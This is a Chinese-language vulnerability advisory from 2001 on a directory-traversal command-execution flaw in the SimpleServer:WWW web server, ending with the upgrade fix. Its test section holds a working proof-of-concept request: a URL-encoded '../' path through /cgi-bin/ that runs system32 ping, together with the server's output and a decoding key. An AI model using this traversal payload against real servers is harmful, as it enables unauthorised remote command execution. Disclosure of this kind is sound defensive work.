SimpleServer:WWW 存在命令可执行漏洞发布时间:2001-07-17 更新时间:2001-07-17 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 SimpleServer:WWW version 1.13和之前的版本详细描述 SimpleServer(http://www.analogx.com/contents/download/network/sswww.htm) 是一个WEB服务程序,其中存在一个远程命令可执行漏洞,当接受到编码 字符时,允许远程攻击者绕过ROOT目录而执行程序。 测试代码 $ telnet 192.168.0.2 80 Trying 192.168.0.2... Connected to 192.168.0.2 Escape character is ^]. GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F %57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping%20192.168.0.1 HTTP/1.0 [NOTE: The above line has been wrapped for readability] HTTP/1.0 200 OK Pinging 192.168.0.1 with 32 bytes of data: Reply from 192.168.0.1: bytes=32 time<10ms TTL=255 Reply from 192.168.0.1: bytes=32 time<10ms TTL=255 Reply from 192.168.0.1: bytes=32 time<10ms TTL=255 Reply from 192.168.0.1: bytes=32 time<10ms TTL=255 Ping statistics for 192.168.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms Connection closed by foreign host. Note, the following URL encoded strings were used: %2E%2E%2F = ../ %57%49%4E%4E%54 = WINNT %73%79%73%74%65%6D%33%32 = system32 解决方案 升级到SimpleServer:WWW 1.15版本。 相关信息 |
